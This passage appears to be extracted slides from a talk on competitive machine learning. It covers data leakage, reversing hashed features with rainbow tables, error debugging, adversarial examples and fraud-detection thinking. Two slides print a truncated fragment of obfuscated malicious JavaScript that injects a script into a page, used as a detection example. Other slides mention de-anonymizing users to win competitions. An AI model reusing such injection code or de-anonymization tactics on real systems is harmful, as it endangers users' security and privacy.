 • Can use semi-supervised learning to extract information from the test set. Use test set for:
 • Frequency (TFIDF) or pre-training language models • Fitting dimensionality reduction • Adding confident predictions as labels to train set github.com/gatapia Guido Tapia
  • 56.
    Rainbow tables • Sometimescategorical variables are hashed to obscure them.
 • Can use rainbow tables to reverse (truncated) MD5 hash and get the original feature.
 • One time, this was obfuscated ordinals for a job puzzle • One time, this was private data: IP addresses. Oops! • One time, they forgot to obfuscate a misspelled patient name in a psychiatric report. Oops!
  • 57.
    Breaking Stuff • Keepasking your curious self: What would happen if I changed this to that? Be Bold!
 • Local evaluation is your lifeline.
 • Try everything, keep the good.
 • Once I got an accuracy of 181% by submitting correct answers twice. Statisticians Machine Learners Smart Machine Learner (The joke is that there are only smart statisticians) CV Intelligible Models for HealthCare: Predicting Pneumonia Risk and Hospital 30-day Readmission (Caruana, 2015)
  • 58.
    DataLeaks • A verycommon mistake. Can be deadly for business and science, so become good at finding leaks. • The task was to predict cancer. One of the variables was “underwent surgery for cancer, yes/no?” • You can not use data that is not reasonably available at test time (or your lifeline evaluation can not be trusted). Leakage in data mining: Formulation, detection, and avoidance (Kaufman et al., 2012)
  • 59.
    DataLeaks • Beware: Themore powerful your model, the bigger chance for exploiting any leakage left that you did not find. • Most powerful model is a 1000 data scientists on a typewriter, so that’s why competitions see larger leakage discovery.
 • A large sample of leakage may simply go undetected. Ben Hamner & Will Cukierski @ Kaggle
  • 60.
    DataLeaks • Winners ofMicrosoft malware binary classification 2015 were able to extract the desktop icon from the code. Visualize malware patterns - Microsoft Malware Classification Challenge BIG2015, (Chen, 2015)
  • 61.
    Sub-Linear Debugging • Outputinformation while your computations are running, essential for iteration speed: • Can spot very fast if some change was good or bad. • Feels like NEO in the Matrix if you do this with the data itself during data reading. • Can spot data health issues (text encoding errors, all missing in the same row of data, etc.) Online Learning and Sub-Linear Debugging (Mineiro, 2014)
  • 62.
    Error Debugging • Seewhere your model makes the biggest mistakes. • Then try to fix it by creating new features • Below sample confidently predicted as minified JS when it was actually obfuscated malicious JS:
 
 
 
 
 
 4x66x32x37x62x33x31x38x30x38x31x34x37x63x32x34x30x62x35x65x31 x63x34x35x34x39x63x36x37x64x65x32","x67x65x74x45x6Cx65x6Dx65x6E x74x73x42x79x43x6Cx61x73x73x4Ex61x6Dx65","x72x65x6Dx6Fx76x65"," x67x65x74x45x6Cx65x6Dx65x6Ex74x42x79x49x64"];function injectarScript(_0x78afx2){return new Promise((_0x78afx3,_0x78afx4)=>{const _0x78afx5=document[_0xc7ae[1]](_0xc7ae[0]);_0x78afx5[_0xc7ae[2]]= true;_0x78afx5[_0xc7ae[3]]= _0x78afx2;document[_0xc7ae[5]][ Warsaw.js
  • 63.
    Error Debugging • Howto fix? • Add count of numbers / count of characters • Add human-readability score • Add count of “x” / count of characters
 
 
 
 
 
 4x66x32x37x62x33x31x38x30x38x31x34x37x63x32x34x30x62x35x65x31 x63x34x35x34x39x63x36x37x64x65x32","x67x65x74x45x6Cx65x6Dx65x6E x74x73x42x79x43x6Cx61x73x73x4Ex61x6Dx65","x72x65x6Dx6Fx76x65"," x67x65x74x45x6Cx65x6Dx65x6Ex74x42x79x49x64"];function injectarScript(_0x78afx2){return new Promise((_0x78afx3,_0x78afx4)=>{const _0x78afx5=document[_0xc7ae[1]](_0xc7ae[0]);_0x78afx5[_0xc7ae[2]]= true;_0x78afx5[_0xc7ae[3]]= _0x78afx2;document[_0xc7ae[5]][
  • 64.
    Dumpster Diving • Youshould find out the sources and shapes of all your data, then do a deep dive:
 • Winners of the IJCNN 2011 Challenge wrote a Flickr crawler to de-anonimize users and obtain the ground truth.
 • Winners of the West Nile Virus Prediction Challenge found research papers which contained part of the ground truth.
 
 Link Prediction by De-anonymization: How We Won the Kaggle Social Network Challenge (2011, Narayan et al.)
  • 65.
    Adversarial Input • Thesepeople are invisible to % of modern face detection CV Dazzle (Harvey et al., 2010)
  • 66.
    Adversarial Input • Thisimage is confusing to modern object detection “A foreign attack helicopter firing missiles” Is attacking machine learning easier than defending it? (Goodfellow et al., 2017)
  • 67.
    Adversarial Input • Beingable to fool neural networks, or build strong defenses against adversarial images is hugely valuable.
 • NIPS2018: Defense Against Adversarial Attack • Goodfellow et al.: CleverHans • Google: Unrestricted Adversarial Examples Challenge
  • 68.
    Adversarial Thinking • Pretendyou are an Identity Fraudster: • Do you hack at night or during your day job/school? • Do you change details like email to match your victim’s name? • Are you more likely to use Windows or Linux? • Do you move location often, or use Tor to hide your location? • Do you try to get as much money as fast as possible or more patient? • Do you memorize your victim’s personal details?
 

  • 69.
    Adversarial Thinking • Tryto attack a system, then invent safeguards: • Encode time of day of the attempt • Look at string distance between legal name and email name • Deduce operating system from user agent string • Check if IP was used for malicious behavior before • Check if IP is a Tor IP • Check for how long user spend in funnel / form behavior • Check if the user demands an unusually high limit • … Statistical Fraud Detection: A Review (Bolton et al., 2002)
  • 70.
    Botnet • Much ofcommercial ML can or is being automated. Much of advertisement fraud is automated already. • It is possible to get a good score in a competition completely automatically. • You can aggregate the results of many (automated) agents and get an even better result. • Thinking back to the ID fraudster example. Can you imagine how to cheat a ML competition? Could you encode ways to safeguard against this? Clickjacking campaign abuses Google Adsense, avoids ad fraud bots (Segura, 2017)
  • 71.
    Case Study: HiggsBoson • “A ciência não pode prever o que vai acontecer. Só pode prever a probabilidade de algo acontecer.” - César Lattes
 • Use data from the ATLAS experiment to identify the Higgs boson (probability of it being signal or background noise)
 • No knowledge of particle physics is required.
 • XGBoost was a 0-day during competition (This could’ve been you!) Higgs Boson Detection Challenge (2014, Kaggle & CERN)
  • 72.
    Case Study: HiggsBoson • Lets hack together a solution: • Create random feature interactions and use Permutation Feature Importance to select the best ones • Add the best interactions to the data • Train 50 randomly initialized XGBoost models • Pick best log loss model and lower the learning rate and use early stopping to find the best amount of trees. • Repeat above 3 times and average results Position: 30/1785
  • 73.
    Further Learning • MOOC’s:Andrew Ng’s Machine Learning on Coursera, Competitive Data Science Coursera, Abu-Mustafa Caltech Learning from Data • Platforms: Kaggle (Tutorials, Projects, Competitions, Forums, Kernels) • Programs: Fast.AI (Learn deep learning state-of-the-art) • Meetups: Sao Paulo Machine Learning Meetup • Books: Programming Collective Intelligence • Blogs: MLWave, FastML, MLWhiz, Machine Learning is Fun! • Professors: Find cool professor and study their online output
  • 74.